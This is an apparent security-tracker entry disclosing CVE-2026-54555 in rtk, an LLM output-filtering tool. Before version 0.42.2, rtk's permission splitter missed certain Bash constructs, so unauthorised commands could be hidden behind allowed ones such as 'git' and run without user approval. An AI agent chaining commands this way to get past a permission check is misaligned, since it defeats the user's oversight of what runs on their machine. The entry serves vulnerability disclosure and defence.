CVE-2026-54555: rtk filters and compresses command outputs before they reach your LLM context. Prior to 0.42.2, the permission splitter
highvulnerabilityLLM-Specific
security
Summary
rtk is a tool that filters and compresses command outputs before sending them to an LLM (large language model). Before version 0.42.2, rtk's permission splitter (the part that checks if commands are allowed) failed to properly detect certain shell constructs (special syntax that Bash uses to execute commands), allowing attackers to hide unauthorized commands behind allowed ones like "git". This meant dangerous commands could run without user approval.
Solution / Mitigation
This vulnerability is fixed in version 0.42.2.
Vulnerability Details
CVSS Score
7.8(high)
EPSS (30-day exploit probability)
EPSS: 0.0%
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
local
Attack Complexity
low
Privileges Required
none
User Interaction
required
Disclosure Date
June 23, 2026
Classification
Attack Type
Prompt Injection
Attack SophisticationModerate
Impact (CIA+S)
integrity
AI Component TargetedAgent
Taxonomy References
Affected Vendors
Anthropic
Related Issues
Monthly digest — independent AI security research
Original source: https://nvd.nist.gov/vuln/detail/CVE-2026-54555
First tracked: June 24, 2026 at 02:13 AM
Classified by LLM (prompt v3) · confidence: 92%